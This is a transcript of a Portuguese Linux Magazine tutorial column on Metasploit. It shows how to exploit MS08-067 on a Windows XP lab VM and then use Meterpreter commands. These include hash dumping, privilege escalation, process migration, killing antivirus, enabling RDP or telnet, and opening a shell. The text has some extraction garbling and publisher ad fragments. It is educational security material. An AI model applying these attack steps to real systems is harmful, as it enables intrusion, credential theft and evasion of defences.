Metasploit – parte 8

Transcrição

Metasploit – parte 8
Coluna do Alexandre
Metasploit – parte 8
Comandos úteis do Meterpreter tendo como alvo o sistema operacional Windows XP para ataques direcionados.
por Alexandre Borges
O
Metasploit disponibiliza um payload especial
chamado de Meterpreter, que proporciona
ampla interação com a máquina alvo após
a invasão, assim como uma inteligente coleta de
dados e possibilidade de execução de uma ampla
variedade de scripts. Não são em todos os casos
de invasão que existe a possibilidade de utilização o Meterpreter como payload de controle, no
entanto, em grande parte das ocorrências isto é
possível e, inclusive, recomendado. Nesta coluna,
ao invés de mostrar a execução dos comandos,
vamos aprender a trabalhar com alguns deles,
suas opções e scripts, e, se necessário, visualizar
a saída resultante. Isto é um convite para que o
leitor possa fazer seus próprios experimentos e
observar com detalhes o resultado de comandos
ou scripts, os quais não seriam factíveis incluir
nesta coluna devido ao seu espaço reduzido.
O ambiente que foi utilizado têm máquinas virtuais WMware ou VirtualBox, sendo que uma delas possui o Kali Linux versão 1.6 – 64 bits e a outra
executa o Windows XP SP2 – 32 bits. Ambas estão
usando uma conexão com o mundo externo do tipo
NAT onde o Kali tem endereço IP 192.168.81.128 e o
Windows tem endereço IP 192.168.81.132. A primeira etapa, mais simples, é realizar a exploração em
busca de uma falha do WinXP e para isso você já
aprendeu nas colunas anteriores que pode fazer
uso do OpenVAS ou do Nesssus para listar as vulnerabilidades. Deste ponto,
podemos usar o Metasploit (figura 1).
O comando show payloads listará os
payloads que podem ser utilizados
e enviados para a máquina explorada, entretanto somente alguns
envolvem o Meterpreter. Por isto,
vamos incluí-lo:
root@kali:~# msfconsole
msf > search ms08-067
msf > use exploit/windows/ smb/ms08_067_netapi
msf exploit(ms08_067_netapi) > show options
msf exploit(ms08_067_netapi) > set RHOST
192.168.81.132
msf exploit(ms08_067_netapi) > show payloads
Figura 1 Console do Metasploit.
explorar a vulnerabilidade citada e isto é feito de
acordo com a figura 2.
Como o leitor pode notar, o sistema foi invadido
com sucesso. Deste ponto, utilizando o meterpreter como payload, o mesmo criou uma sessão para
a máquina alvo, nos proporcionando um enorme
leque de alternativas onde uma lista com algumas
opções possíveis seguem abaixo:
ps » observa todos os processos sendo executados
na máquina invadida;
getid » evidencia com qual usuário estamos logados após a invasão;
sysinfo » mostra informações do sistema invadido
screenshot » tira uma foto do deskop da máquina invadia e a armazena no diretório /root;
getpid » obtém o PID do processo que está sendo executado depois de ter invadido a máquina;
migrate <pid> » migra a sessão usada pelo Meterpreter para outro processo que seja persistente
(figura 3). O motivo disto é evitar que o usuário
da máquina invadida termine o processo no qual
estamos conectados e, com isto, seja perdido o
acesso ao host por parte do hacker;
hashdump » realiza um “dump” do SAM (Security Account Manager). Todavia, para que isto possa ser
feito com sucesso, devemos nos conectar como
SYSTEM. Caso este não seja o caso, tente elevar o
msf exploit(ms08_067_netapi) > set
payload windows/
meterpreter/bind_tcp
Deste ponto em diante
estamos prontos para
10
Figura 2 Exploração bem sucedida de vulnerabilidade.
www.linuxmagazine.com.br
Figura 3 Transferência da sessão ativa do Meterpreter.
privilégio com o comando use priv antes do comando hashdump. Após obter os hashes, uma opção
seria usar um cracker como “John the Ripper” ou
“L0phtCrack” para descobrir as senhas. Escrevi
um tutorial simples sobre o assunto que pode ser
acessado em [1];
background » deixa a sessão do Meterpreter em segundo plano e volta para o prompt normal do msfconsole;
sessions -l » lista as sessões ativas do Meterpreter;
session -i » assume uma sessão do Meterpreter
de forma interativa;
run checkvm » verifca se a máquina explorada é executado em uma máquina virtual ou não;
run getcountermeasure » realiza a verificação de quais
medidas de segurança estão implementadas na
máquina alvo;
run killav » desabilita programas antivirus que estão em execução na máquina de destino;
run scraper » coleta diversas informações sobre o
sistema alvo, incluindo o registro no caso de máquinas Windows, e salva em um diretório local
(como /root/.msf4/logs/scripts/scraper);
D
I
T
O
R
Figura 5 Abertura de shell na máquina hackaeada.
run getgui -e » habilita o Remote Desktop Protocol (RDP)
na máquina alvo caso ele esteja desabilitado (figura 4).
run winenum » executa enumeração completa da
máquina alvo;
run gettelnet -e » habilita o serviço de telnet no destino.
run shell » abre um shell para a máquina hackeada (figura 5). n
Mais informações
[1] Como descobrir senhas: http://alexandreborges.
org/2013/08/05/introduction-to-password-cracking-part-1/
Distribuidora exclusiva da Série linux Pro
ALTA BOOKS
E
Figura 4 RDP na máquina alvo.
A
os
os livr m
s
o
d
o
T
co
so site
do nos desconto
e
30% d código
com o onal* Código:
ci
14
promo
ln x 2 0
Conheça também:
/altabooks
alta_books
Linux Magazine #108 | Fevereiro de 2014
www.altabooks.com.br
Rua Viúva Cláudio, 291 – Rio de Janeiro - RJ
Tels: (21) 3278-8069 | (21) 3278-8159
11
* Promoção válida por tempo limitado, somente para compras realizadas no site www.altabooks.com.br

Documentos relacionados

Tutoriais de Segurança de Redes

Tutoriais de Segurança de Redes “win32_bind”, caso a vulnerabilidade seja explorada com sucesso, a execução do exploit resultará na disponibilização de uma shell no sistema remoto. A seleção do payload específico é feita através ...

Leia mais